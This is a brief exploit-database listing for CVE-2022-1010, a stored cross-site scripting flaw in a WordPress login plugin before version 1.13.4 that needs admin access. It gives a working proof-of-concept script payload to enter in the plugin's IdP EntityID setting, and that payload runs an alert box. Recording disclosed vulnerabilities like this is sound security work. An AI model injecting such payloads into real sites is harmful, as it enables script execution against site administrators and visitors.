Exploit for Login using WordPress Users < 1.13.4 - Admin+ Stored Cross-Site Scripting CVE-2022-1010

Name: Exploit for Login using WordPress Users < 1.13.4 - Admin+ Stored Cross-Site Scripting CVE-2022-1010
Rating: 5 (76 reviews)

2022-06-06 | CVSS 3.5

## https://sploitus.com/exploit?id=WPEX-ID:E9E4DFBE-01B2-4003-80ED-DB1E45F38B2B
Put the following payload in the "IDP Metadata" > "IdP EntityID / Issuer" setting: "><script>alert(String.fromCharCode(88,83,83))</script>